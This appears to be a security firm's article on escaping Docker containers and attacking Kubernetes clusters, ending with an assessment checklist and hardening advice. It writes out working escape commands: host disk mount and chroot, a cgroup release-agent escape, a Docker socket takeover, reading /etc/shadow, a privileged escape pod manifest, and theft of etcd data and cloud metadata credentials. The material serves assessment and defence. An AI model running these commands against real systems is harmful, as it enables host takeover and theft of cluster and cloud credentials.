Container Security: Escaping Docker and Attacking Kubernetes
Containers run on shared kernels. Unlike virtual machines, which interpose a hypervisor between a guest operating system and the hardware, containers share the host kernel directly. The isolation that makes containers appear separate comes from Linux namespaces and cgroups — kernel features that restrict visibility and resource access, not features that enforce hard security boundaries.
This distinction matters for security assessments. A misconfigured container is not just a compromised application. It is a foothold on the host, and in an orchestrated environment, potentially a path to every workload in the cluster.
The Privilege Hierarchy in Containerized Environments
Before examining specific escape paths, it helps to understand what "full compromise" means in each layer of a containerized stack.
Container process compromise means code execution within the container's filesystem and namespace with the container's privileges. The attacker can read files the application can read, make network connections the container's network policy allows, and interact with any APIs the container's service account can reach.
Host compromise means the container's isolation has been bypassed and the attacker has access to the underlying node — its filesystem, its processes, its network interfaces, and any other workloads running on it.
Cluster compromise means the attacker can deploy workloads, read secrets, and control configuration across the entire Kubernetes cluster, regardless of which namespace or node they started on.
Container escapes move an attacker from the first level to the second. Kubernetes misconfigurations often provide a direct path to the third.
Docker Container Escapes
Privileged Containers
The most direct path from container to host is the --privileged flag. A container launched with docker run --privileged has all Linux capabilities enabled, no seccomp profile enforced, and no AppArmor restrictions applied. The container can interact with the host kernel as if it were running natively.
The canonical escape is straightforward:
# Inside a privileged container
fdisk -l # identify host block devices
mkdir /mnt/host
mount /dev/xvda1 /mnt/host # mount the host filesystem
chroot /mnt/host # enter the host rootAfter the chroot, the attacker operates in the host filesystem with root privileges. Adding a backdoor user, writing an SSH authorized key, or installing a cron job is trivial from this position.
A second path that does not require knowing the block device is abusing host cgroup access:
# Privileged containers can write to host cgroup release agents
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "id > /output" >> /cmd # replace with actual payload
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# The release agent executes on the host when the cgroup emptiesThis technique executes a command on the host through the cgroup release agent mechanism without requiring the host filesystem to be mounted first.
Mounted Docker Socket
The Docker socket (/var/run/docker.sock) is the Unix socket through which Docker clients communicate with the Docker daemon. The daemon runs as root and has full control over every container on the host.
When a container has the Docker socket bind-mounted into it — a practice common in CI/CD environments where pipelines need to build and run containers — any process in that container can talk to the Docker daemon directly.
# Inside a container with /var/run/docker.sock mounted
docker run -v /:/host -it --rm ubuntu:22.04 chroot /hostThis single command, executed from inside a container with socket access, launches a new privileged container with the host filesystem mounted, then enters a shell with host root access. The container process effectively controls the Docker daemon and can use it to escape.
Testing for a mounted Docker socket requires only checking whether the path exists and is writable. Curl against the Docker API socket confirms accessibility:
curl --unix-socket /var/run/docker.sock http://localhost/versionA successful response confirms full Docker API access and immediate host compromise potential.
Host Namespace Sharing
Docker allows specific host namespaces to be shared with containers: --pid=host, --network=host, --ipc=host. Each trades isolation for capability in ways that create security exposure.
--pid=host is particularly dangerous from an assessment perspective. A container with host PID namespace access can see all processes running on the host and send signals to them. More practically, it can access /proc/<pid>/root for any host process, which is a symlink to the root filesystem of the process's mount namespace — the host filesystem:
# Inside a container with --pid=host
ls /proc/1/root/ # lists the host root filesystem
cp /proc/1/root/etc/shadow /tmp/shadow # reads host shadow file--network=host places the container in the host's network namespace, making it possible to listen on host ports and access host network interfaces directly — bypassing any container network policy that would otherwise restrict traffic.
Kubernetes Cluster Attacks
Service Account Token Abuse
Every Kubernetes pod runs under a service account. Unless the pod spec sets automountServiceAccountToken: false, a JWT token for the service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
The token can authenticate to the Kubernetes API server:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc
# Enumerate what the service account can do
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" \
"$APISERVER/api/v1/namespaces/default/secrets"The critical question is what RBAC permissions are bound to the service account. Even if no explicit role binding exists, Kubernetes ships with a system:discovery role that is bound to all authenticated users by default, allowing the token to enumerate cluster resources.
More dangerous is the common pattern of binding the cluster-admin ClusterRole to the default service account in a namespace, or granting secrets:get to a service account that runs an application with untrusted input. With secrets:get on the cluster scope, the token can read every secret in every namespace — including other applications' database credentials, TLS private keys, and tokens for external services.
RBAC Privilege Escalation
RBAC misconfigurations fall into predictable patterns. The most impactful:
Wildcard permissions on resources. A role with verbs: ['*'] on resources: ['*'] is equivalent to cluster-admin for the service account. Wildcards in RBAC rules appear frequently when administrators create roles quickly and intend to restrict them later.
Create-pod access. A service account that can create pods can create a privileged pod with hostPID: true, hostNetwork: true, and a hostPath volume mounting the host filesystem. This is a full host escape through the API server:
apiVersion: v1
kind: Pod
spec:
hostPID: true
hostNetwork: true
containers:
- name: escape
image: ubuntu
command: ["/bin/bash"]
args: ["-c", "chroot /host bash"]
securityContext:
privileged: true
volumeMounts:
- name: host
mountPath: /host
volumes:
- name: host
hostPath:
path: /Manage-roles or bind-clusterroles access. The ability to create or modify role bindings is effectively the ability to grant oneself any permission in the cluster. An attacker with create on rolebindings can create a binding that grants cluster-admin to their service account.
Exec into pods. The pods/exec subresource allows attaching to running containers. An attacker with this permission can execute commands in any pod in scope — including sensitive workloads like database administrators, secrets managers, or monitoring agents.
etcd Access
etcd is the key-value store that Kubernetes uses to persist all cluster state — including every Secret object, every Service Account token, and all configuration. By default, Kubernetes secrets are stored in etcd with only base64 encoding, not encrypted at rest.
An attacker with network access to the etcd endpoint (typically port 2379) and a valid client certificate can dump the entire cluster state:
etcdctl --endpoints=https://etcd-host:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get / --prefix --keys-onlyetcd should only be accessible from the API server and should require mutual TLS with a restricted CA. Assessment targets where etcd listens on a broader interface, or where the certificates are accessible from within a compromised pod, represent critical findings.
Cloud Metadata Endpoint Access
In cloud-managed Kubernetes environments, each node is a cloud instance with an associated instance metadata endpoint. On AWS, this is the Instance Metadata Service at 169.254.169.254. On GCP it is metadata.google.internal. On Azure it is 169.254.169.254 with a different API.
The metadata endpoint returns temporary credentials for the instance's IAM role without authentication. If the node's instance role has permissions beyond what the cluster itself needs — common when operators grant broad cloud API access for node autoscaling, load balancer management, or storage provisioning — any pod running on that node can retrieve those credentials:
# From inside a pod on AWS
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, then:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/node-role
# Returns AccessKeyId, SecretAccessKey, SessionTokenWith these credentials, the attacker can make calls to the cloud API with the permissions of the node role — potentially listing and downloading S3 buckets, describing EC2 infrastructure, assuming other IAM roles, or escalating further within the cloud environment.
IMDSv2 (AWS) requires a session-oriented request with a token obtained via PUT, which adds a layer of protection. But it only applies if explicitly configured. Clusters that have not enforced IMDSv2 on their node groups remain exposed.
Network policy can block pods from reaching 169.254.169.254, but only if network policy is enforced and the relevant egress rules are present.
Assessment Methodology
A container security assessment follows a consistent progression from the inside out.
From within a pod:
- Read the mounted service account token and query the API server — enumerate what the token can do
- Check for
/var/run/docker.sock— its presence enables immediate host compromise - Check the pod's security context:
cat /proc/1/status | grep Capreveals current capabilities;privileged: trueis directly observable from inside - Attempt to reach the cloud metadata endpoint — a successful response warrants credential retrieval and cloud privilege analysis
- Check environment variables for secrets passed as env vars rather than volumes
From the Kubernetes API:
- Enumerate ClusterRoleBindings for the
defaultservice account and any application service accounts - Look for any subject with create access to pods, role bindings, or cluster role bindings
- Check for secrets accessible to assessed service accounts — the presence of
dockerconfigjsonsecrets or cloud credentials in secrets indicates infrastructure-level access - Review admission controller configuration — the absence of a pod security admission policy or OPA/Gatekeeper allows arbitrary pod specs including privileged workloads
Infrastructure review:
- Confirm etcd is not accessible from the pod network
- Confirm the API server's anonymous-auth is disabled
- Verify that node instance roles follow least privilege
- Check whether network policy enforces egress restrictions to the metadata endpoint
Hardening Guidance
The most impactful mitigations reduce the blast radius when a workload is compromised.
Disable service account token auto-mounting for pods that do not need API server access. Set automountServiceAccountToken: false in the pod spec or the service account itself.
Apply Pod Security Standards using Kubernetes' built-in admission controller. The restricted profile prohibits privileged containers, host namespace sharing, and host volume mounts. The baseline profile blocks the most common escape vectors while permitting most legitimate workloads.
Enforce least-privilege RBAC. Audit ClusterRoleBindings regularly. The default service account should have no bindings beyond the cluster defaults. Application service accounts should have narrowly scoped roles in their namespace only.
Block cloud metadata endpoints with network policy egress rules that deny traffic to link-local addresses from all pods except those that specifically require it.
Enable etcd encryption at rest using Kubernetes' EncryptionConfiguration. This does not prevent an attacker with etcd access from reading data, but it prevents offline analysis of etcd backups.
Audit container images for setuid binaries and excessive capabilities. The presence of nsenter, mount, fdisk, or other administrative binaries in a container image expands the options available to an attacker who achieves code execution.
Container security is layered. No single control makes a cluster uncompromisable. The goal is to ensure that a container compromise does not automatically translate to host or cluster compromise — and that each step toward escalation is visible in logs.
For a technical assessment of your containerized infrastructure, get in touch.